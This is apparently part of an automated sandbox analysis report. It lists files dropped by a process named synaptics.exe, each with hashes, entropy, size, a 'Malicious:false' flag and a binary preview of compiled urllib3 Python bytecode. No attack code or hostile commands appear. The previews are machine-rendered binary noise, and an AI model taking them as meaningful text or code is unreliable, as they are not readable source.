                                                                                                                                                                                                                SHA-512:2B854B5BD40A60C37C6A8D5ABA10E75ED8D027100BBA57DB40BA24B1296CD70A45E13342A4CBEDDED95FC6D350405E8B2E70CD5E2642F338A143E828764A33E3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9701
                                                                                                                                                                                                                Entropy (8bit):5.39838188639722
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:CIk7HKu22d82vhf5Ev375rL9FYAKHK0oi7:Tk7HKu22Cehf+vL5rL9FYAKHboi7
                                                                                                                                                                                                                MD5:C5C5B60925F3FD0BB5CF887C16EB3D1B
                                                                                                                                                                                                                SHA1:2617C5BC224C2A8E3B11199DD67E6A3DB9421494
                                                                                                                                                                                                                SHA-256:7EED02F3496E17A38DD6A74F6E78778EA6EBE9D751F4FE3B6FB68CCFA072060A
                                                                                                                                                                                                                SHA-512:15CC009F6D2B7BD94798C2E7DF3C610E0AE048D51479EF3A6FE208B0D263EF8F8A99A72B560AB001762745AEB991F4D8150A20719F7BE8032C7544189D09AF67
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypesZ.guess_type).r....r......r.....=C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function to format and q
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2331
                                                                                                                                                                                                                Entropy (8bit):5.57875179670287
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:BL1hfLSZUyrfcuCKwlb9BEA2GS8FD5yHbVz:NLSZxc59TEA2CDUHbx
                                                                                                                                                                                                                MD5:8EC6377DD28ADF50E08929F9E358D816
                                                                                                                                                                                                                SHA1:E6C2723C0AC28BD5B6590FE4A9929F6E2300A4EB
                                                                                                                                                                                                                SHA-256:DDF7087F8EC76758267A5630DE9F5DBECF24C6956D52BBD8650467B6F48130CD
                                                                                                                                                                                                                SHA-512:1E5212FE5DDF6B20224997BA7901D0688FADCA8D3FF89E2FDAB4C1F615D96F1AFB72A4C30559EF066F3A92EA05643262FFFFF500931512A851F2AF0FCC959C05
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....?C:\Users\user\Desktop\tmp\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable..fieldr....r..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):18187
                                                                                                                                                                                                                Entropy (8bit):5.489163460827947
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ulCIl5+QTvw7bm2+Pp0hTZp4tGwimHF3Y:uvgQTvwng+NZp8Bl3Y
                                                                                                                                                                                                                MD5:7BEB2F54A108F776326F5E8F00C1BF21
                                                                                                                                                                                                                SHA1:C40C3DEA875418DE40A725CFDB5A12CD31A84A46
                                                                                                                                                                                                                SHA-256:80BABCC4D9F159C1591E9F0D878CA6D968B6877CE9848001D964A216E74C0DCC
                                                                                                                                                                                                                SHA-512:57304B50EE1FD4DED7F3EFCCF3F297C690B3E05756F343CAC497C94E5AF84653CD8A5430857DBD8AF1AAE0DFC3E0D25B2CC8E061748EA097208ABCDDB5E9553A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.Y.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..e.j'r.d.d.l(Z(d.d.l)m*Z*..g.d...Z+e..,e-..Z.d.Z/d.Z0G.d.d...d.e.j1..Z2d)d.d...Z3e..4e3e2..e..4e3e2..d...Z5e.e.d...Z6G.d.d ..d e...Z7G.d!d"..d"e7..Z8d*d'd(..Z9d.S.)+.....)...annotationsN)...TracebackType)...urljoin.....)...HTTPHeaderDict..RecentlyUsedContainer)...RequestMethods)...ProxyConfig)...HTTPConnectionPool..HTTPSConnectionPool..port_by_scheme)...LocationValueError..MaxRetryError..ProxySchemeUnknown..URLSchemeUnknown)...BaseHTTPResponse)..._TYPE_SOCKET_OPTIONS)...connection_requires_http_tunnel)...Retry)...Timeout)...Url..parse_url)...Self)...PoolManager..ProxyManager..proxy_from_url)...key_file..cert_file..cert_reqs..ca_certs..ca_cert_data..ssl_version..ssl_minimum_version..ssl_maximum_version..ca_cert_dir..ss
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33449
                                                                                                                                                                                                                Entropy (8bit):5.333366958332206
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:uPBkshRIwAG560Mg+c3lKBgtd1xaZ38CSYJr/YV4CypM0AmwK2Kd1B+E1dz6RPrX:NGc8L1KBaPxbupCIAHK2KZiy8wUhX
                                                                                                                                                                                                                MD5:A99EE77998387DB38AD133890BE81DF5
                                                                                                                                                                                                                SHA1:5EF31F02C445BD8728D094167F82CD05EFDFA8C3
                                                                                                                                                                                                                SHA-256:316CC4F752228E2655F5D9A746D6AEB4223842ACA6DDA76C0B55BE01B8083ABB
                                                                                                                                                                                                                SHA-512:8A4E1BC27E0AFB6990B9DDCFD80FD71FDC3BC7E1E2B1F3EF6C0A122CE5A5C95EA3AD96DC06FB318AD9F1EFD2E3E7DFF7DFCC7347741F592475C9193EB66D1FE3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.rKd.d.l.m.Z...z.z.d.d.l.Z.W.n...e.y_......d.d.l.Z.Y.n.w.W.n...e.yl......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.e.e.f.y.......d.Z Y.n.w.e!e"e#e..$d.e.j%...&......Z'e'd.k.r.d.Z n.d.Z d.d.l(m)Z)..d.d.l.m*Z*..d.d.l+m,Z,..d.d.l-m.Z.m/Z/m0Z0..d.d.l1m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>..d.d.l?m@Z@..e.j.r.d.d.lAmBZB..e..CeD..ZEG.d.d...d...ZFG.d.d...d.eF..ZGG.d.d...d...ZHG.d.d...d.eF..ZIe.d.u...r.G.d.d...d.eF..ZJe ..r.G.d.d ..d eF..ZKG.d!d"..d"eF..ZLd.d&d'..ZMG.d(d)..d)..ZNG.d*d+..d+e.jO..ZPG.d,d-..d-eP..Z.d.S.)/.....)...annotationsN)...contextmanager)...HTTPMessage)...HTTPResponse)...timeout.....)...BaseHTTPConnectionFz.^([0-9]+)\.([0-9]+)).r.........T)...util)..._TYPE_BODY)...HTTPHeaderDict)...BaseSSLError..HTTPConnection..HTTPException)...BodyNotHttplibCompatible..DecodeError..HTTPError..IncompleteRead..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):164
                                                                                                                                                                                                                Entropy (8bit):4.416281924108459
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:y/jr5/Ulluleh/wZWeiouWDT6MWRIFMHdVWrzOXH+IOkcTgp:y/h/U/qeh/wxZDGuFM9Ar6XeR4
                                                                                                                                                                                                                MD5:7E3D2ACEC6F620862E29473F57D4391F
                                                                                                                                                                                                                SHA1:BB19F3A944E0C24023CA3E88455FC10EA64C1625
                                                                                                                                                                                                                SHA-256:60B96CD4CDA2E831C2E62B3F80D2BB7569F863A1295A5A03874F248B13D9B43F
                                                                                                                                                                                                                SHA-512:B3415D52F2260EFF646BEA6734723F732DA0BF509C409301CDEA03DC25F86EBCFB3A21C2D8AD5C00AEE14BDFD32C864A5658F568F2102C06F99DB2FE5DA73FA4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.S.).N..r....r....r.....GC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\contrib\__init__.py..<module>....s......
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6125
                                                                                                                                                                                                                Entropy (8bit):5.629837834761319
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:bq8bFojUEqiHSz8iKWZMs7hTbWiTmC69iE245Zi81JQ3:26VEqtQGbC9ipca3
                                                                                                                                                                                                                MD5:79E9DBEEC079F81EDB020276DB22F339
                                                                                                                                                                                                                SHA1:1454BCC658ABBB8C7F813FCC24BB7313BE4322C0
                                                                                                                                                                                                                SHA-256:93E27273B1186A444A2D5DBD88E5C1F2787A5B8FB4F2D1FB019A24E01CF47FE4
                                                                                                                                                                                                                SHA-512:617ADDDA62F97A2F1EBBA0E51CCCC3FF9FDF5DBC3496553F78B77EF646849308424472F532E1F2B87609F405AB018C3A79C3C686144B16B492F6164E166C679C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f}........................@...s6...d.Z.d.d.l.m.Z...z.d.d.l.Z.W.n...e.y&......d.d.l.Z.d.d.l.m.Z...e...d.e.......w.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.yf......d.Z.Y.n.w.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z d.S.).a.....This module contains provisional support for SOCKS proxies from within.urllib3. This module supports SOCKS4, SOCKS4A (an extension of SOCKS4), and.SOCKS5. To enable its functionality, either install PySocks or install this.module with the ``socks`` extra...The SOCKS implementation supports the full range of urllib3 features. It also.supports the following SOCKS features:..- SOCKS4A (``proxy_url='socks4a://...``).- SOCKS4 (``proxy_url='socks4://...``).- SOCKS5 with remote DNS (``proxy_url='socks5h://...``).- SOCKS5 with local DNS (``proxy_url='socks5://...``).- Usernames and passwords for the SOCKS proxy.... note::. It is recom
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1401
                                                                                                                                                                                                                Entropy (8bit):5.3767784610005345
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:rMu6QKYYYH7N9QU4DMU3KZsGfM3yRiR7FzGW92vbwFWHrb49msQWP7:gBdYLbX4DinRayD9Hrb4mAP7
                                                                                                                                                                                                                MD5:28159DC1C1799E993309D3524C34E75C
                                                                                                                                                                                                                SHA1:36F78187DFBBF2F0C240E97A6B577ABECDB465FD
                                                                                                                                                                                                                SHA-256:974900C1AEA92BBA102142F93D24793362F5E2F686C7A455EFB7A7A8A43BB174
                                                                                                                                                                                                                SHA-512:DA73C5B1CCB7D8F4C5FAE7CB6A376404F533885DFDCE418ACFE6479C256889C5CDF754A6F7C706AAF63BC14DD4E7DA998D4BD4DD9D8F2311487099AEFF05240B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sN...U.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.l.Z.d.a.d.e.d.<.d.d.d...Z.d.d.d...Z.d.S.)......)...annotations)...version..inject_into_urllib3..extract_from_urllib3Nz.typing.Any..orig_HTTPSConnection..return..Nonec....................C...s....t.d...}.|...d...s.t.d.|...d.......d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...d.d.l.m.}...|.j.a.|.|._.|.|._.d.g.|._.d.g.|._.d.S.).N..h2z.4.zQurllib3 v2 supports h2 version 4.x.x, currently the 'h2' module is compiled with z5. See: https://github.com/urllib3/urllib3/issues/3290.........connection....util....HTTPSConnectionPool....ssl_.....)...HTTP2Connection).r......startswith..ImportError..r....r......connectionpoolr....r....r......HTTPSConnectionr......ConnectionCls..ALPN_PROTOCOLS).Z.h2_version..urllib3_connection..urllib3_utilr......urllib3_util_sslr......r.....EC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\http2\__init__.pyr........s".....................................c....................C...sP.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                Entropy (8bit):5.244052915134119
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:KBPQG3rPHqRTB08DGmDZrZCYawGQ2bcwf27jpWsI663cv6iuJh6+:KBzG/DGmDZEYaw4bbujpXkSNok+
                                                                                                                                                                                                                MD5:4752D728C72D7AC4CA23EA00006DC855
                                                                                                                                                                                                                SHA1:CCBC5A38347F7E5FD56C731248D0C63E7BC6A8E7
                                                                                                                                                                                                                SHA-256:CB22EE7CF87826786FC32AD134E008D953D4F54CDF743BB0CBD39C77B8052627
                                                                                                                                                                                                                SHA-512:E00E08948661055F0F3658CF5344E98CE48F3AFB10DDB301C968B13DFC5800C91073CCACC1F70CB3817F9664E8FB7AFF8FD00E0257A0ACBDB11689906C34A908
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sL...d.d.l.m.Z...d.d.l.Z.G.d.d...d...Z.e...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.d.d.g.Z.d.S.)......)...annotationsNc....................@...sB...e.Z.d.Z.d.Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)..._HTTP2ProbeCache...._lock.._cache_locks.._cache_values..return..Nonec....................C...s....t.....|._.i.|._.i.|._.d.S...N)...threading..Lockr....r....r........self..r.....BC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\http2\probe.py..__init__....s..........z._HTTP2ProbeCache.__init__..host..str..port..int..bool | Nonec....................C...s....d.}.|.j..7..|.|.f.}.z.|.j.|...}.|.d.u.r.|.W.W...d.........S.W.n...t.y4......t.....|.j.|.<.d.|.j.|.<.Y.n.w.W.d.........n.1.s?w.......Y...|.j.|...}.|.......z.|.j.|...}.W.|.S...t.ym..}...z.t.|.t...rdJ...|.........d.}.~.w.w.r....).r....r......KeyErrorr......RLockr......acquire..BaseException..isinstance..release).r....r....r......value..key..key_lock..er....r....r......acquire_and_get....s4.....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):944
                                                                                                                                                                                                                Entropy (8bit):5.298813273907028
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:nJUVegJzYoyYhRYQZyihmLptrv2buqq9PXDGL:n3gJz2Y39Zyi0TrOaqq9Pc
                                                                                                                                                                                                                MD5:6218DD074BC37E3A4AD6B35C95310DC8
                                                                                                                                                                                                                SHA1:4587640CCEC18FFB6BF3141DC19EF16AB9FC979F
                                                                                                                                                                                                                SHA-256:5EAAB18E35FDC9DAEE691CE931EAC1A4F5B6BC6F971703905CF6F26CA5BEAC05
                                                                                                                                                                                                                SHA-512:1B62D4BAC22E9AF447AA3F7F619C1322485293324FB5C6DAA9BDF2BC6DA922452CABFF57B8375DAA49F1FBDD6A2327C252C703C0796ADE4694CE7CDF6B5C433D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.S.)......)...annotations.....)...is_connection_dropped)...SKIP_HEADER..SKIPPABLE_HEADERS..make_headers)...is_fp_closed)...Retry)...ALPN_PROTOCOLS..IS_PYOPENSSL..SSLContext..assert_fingerprint..create_urllib3_context..resolve_cert_reqs..resolve_ssl_version..ssl_wrap_socket)...Timeout)...Url..parse_url)...wait_for_read..wait_for_write).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...__future__r......connectionr......requestr....r....r......responser....Z.retryr....Z.ssl_r....r....r....r....r....r....r....r......timeoutr......urlr....r......waitr....r......__all__..r....r.....DC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\__init__.py..<module>....s..............(.........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3463
                                                                                                                                                                                                                Entropy (8bit):5.537640901737742
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Zd8QkXnG1+RA+j7JArpwwSRGR7UAm0DEWStUV5yrIeoYPqr+rb8WTUVHwZJP9+:HkX0+m+hAVwwStdndm5YXiub8WT3ZJI
                                                                                                                                                                                                                MD5:162B1F44D240F2F57ED98102F96A740B
                                                                                                                                                                                                                SHA1:407BBF2C0893D6C60AD5DFEC2F9F68144E93DDFE
                                                                                                                                                                                                                SHA-256:F0345999CE1DB3B256F3AEF30C7C4E2CD9A70808BFF5801BD500326CEFC77400
                                                                                                                                                                                                                SHA-512:53B5C28076A62130A60DD0DFDF7F02B895DDEEDE849E1AFB221FE082688043D12AE1E3A6019F50B775E79BFC27AEBEAEA7DF58A34DC21D772F8D04BBA49A0829
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.fj........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.j.e.e.e.j.e.e.f...f.....Z.e.j.r5d.d.l.m.Z...d&d.d...Z.e.d.d.f.d'd.d...Z.d(d.d...Z.d)d.d ..Z.d*d#d$..Z.e.d%..Z.d.S.)+.....)...annotationsN.....)...LocationParseError.....)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...BaseHTTPConnection..connr......return..boolc....................C...s....|.j...S.).z.. Returns True if the connection is dropped and should be closed.. :param conn: :class:`urllib3.connection.HTTPConnection` object.. )...is_connected).r......r.....FC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\connection.py..is_connection_dropped....s......r......address..tuple[str, int]..timeoutr......source_address..tuple[str, int] | None..socket_options.._TYPE_SOCKET_OPTIONS | None..socket.socketc....................C...s$...|.\.}.}.|...d...r.|...d...}.d.}.t...}.z.|...d.....W.n...t.y*......t.d.|...d.....d...w.t...|.|.|.t.j...D.]O}.|.\.}.}.}.}.}.d.}.z(t...|.|.|...}.t.|.|
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                Entropy (8bit):5.366043155096196
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:U6/ZpGf5n/lIpWt84RzmQXvAFnT8adLRU0G7frY8lt6rn:1ut/Rt82m38apK5f7S
                                                                                                                                                                                                                MD5:F923449B2856B4525E490A14343880B6
                                                                                                                                                                                                                SHA1:FE44578AC3748235735476B1F00E57DE8BFC11D1
                                                                                                                                                                                                                SHA-256:457BFE0FD0AEBFFE87357CBABD4991B0D5BA3BE2B67B9B428C00A2D57723DCF5
                                                                                                                                                                                                                SHA-512:8D7113CC2C56EFB1ED36EFBD0D4B976FDFE2C2BACC19B92C77DF506046E719AB969BC5EA97737188D363BE62ECF3B4B1A48EBEDA758AE1258695EF4FA5AACAA8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f|........................@...sH...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.r.d.d.l.m.Z.........d.d.d.d...Z.d.S.)......)...annotationsN.....)...Url.....)...ProxyConfig..proxy_url..Url | None..proxy_config..ProxyConfig | None..destination_scheme..str | None..return..boolc....................C...s4...|.d.u.r.d.S.|.d.k.r.d.S.|.j.d.k.r.|.r.|.j.r.d.S.d.S.).a?.... Returns True if the connection requires an HTTP CONNECT through the proxy... :param URL proxy_url:. URL of the proxy.. :param ProxyConfig proxy_config:. Proxy configuration from poolmanager.py. :param str destination_scheme:. The scheme of the destination. (i.e https, http, etc). NF..http..httpsT)...scheme..use_forwarding_for_https).r....r....r......r.....AC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\proxy.py..connection_requires_http_tunnel....s..........................r....).NNN).r....r....r....r....r....r....r....r....)...__future__r......typing..urlr......TYPE_CHECKING..con
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6198
                                                                                                                                                                                                                Entropy (8bit):5.647243775289676
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:xj+t5WiDKV+DKYzQ2P7f5xv5j4GyT/+MyjjMbsrHMCtkXT3v5tChK:kXKV+DKYzP7xx6tsjM4HITDN
                                                                                                                                                                                                                MD5:382A9CD15AB81DCFBD774A8B78C5C5D8
                                                                                                                                                                                                                SHA1:B24EF4047528B60A244966CC74B1E222CE47ED04
                                                                                                                                                                                                                SHA-256:51ED94131CA47AA3C58893141788C65D541E224E5FB32757CA4AB4CF1FDFCD1F
                                                                                                                                                                                                                SHA-512:74C2D6308D64732CB9E8DEBFFEB2875B04A7AC49D6BFCC60375F3D7F4A905EDE3DEBE29F9D500F67FC9219D7AAB97F8124A0AD3691711293DAC12E4FED67F9C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sd...U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r0d.d.l.m.Z...d.Z.e.g.d.....Z.d.Z.z.z.d.d.l.Z.W.n...e.yN......d.d.l.Z.Y.n.w.W.n...e.yY......Y.n.w.e.d.7.Z.z.d.d.l.Z.W.n...e.ym......Y.n.w.e.d.7.Z.G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.e.f...Z.h.d...Z.............d6d7d.d ..Z d8d%d&..Z!d9d+d,..Z"G.d-d...d.e.j#..Z$d:d4d5..Z%d.S.);.....)...annotationsN)...b64encode)...Enum.....)...UnrewindableBodyError.....)...to_bytes)...Finalz.@@@SKIP_HEADER@@@)...accept-encoding..host..user-agentz.gzip,deflatez.,brz.,zstdc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_FAILEDTELLr....N)...__name__..__module__..__qualname__..token..r....r.....CC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\request.pyr....'...s........r....z.Final[_TYPE_FAILEDTELL].._FAILEDTELL>....Z.DELETE..HEADZ.OPTIONSZ.TRACEZ.GETZ.CONNECT..keep_alive..bool | None..accept_encoding..bool | list[str] | str | None..user_agent..str | None..basic_aut
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2330
                                                                                                                                                                                                                Entropy (8bit):5.360914038588091
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:imhh166JQ+Nk7gkL2YMHhfpm7kmpx6nriZEviRo3C:J66GslvhaIds
                                                                                                                                                                                                                MD5:CC27A57BE56A591CD903D09F892BF5EB
                                                                                                                                                                                                                SHA1:C827301099BEB3DEE996ABE3213572E8C239BC09
                                                                                                                                                                                                                SHA-256:973B65A50D9E0F32605DCC4A0812F6F41798D3D558A328DE50F8C3DD1CB0F2D2
                                                                                                                                                                                                                SHA-512:3409C5AED2A354B0C8050DF2E377D4C942560B426FA530F23FE40615159D984142A88CBD41B63710213D6E8ECA3279A297633D6285810C9A665886B267189C23
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........!.f.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....DC:\Users\user\Desktop\tmp\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been successfully
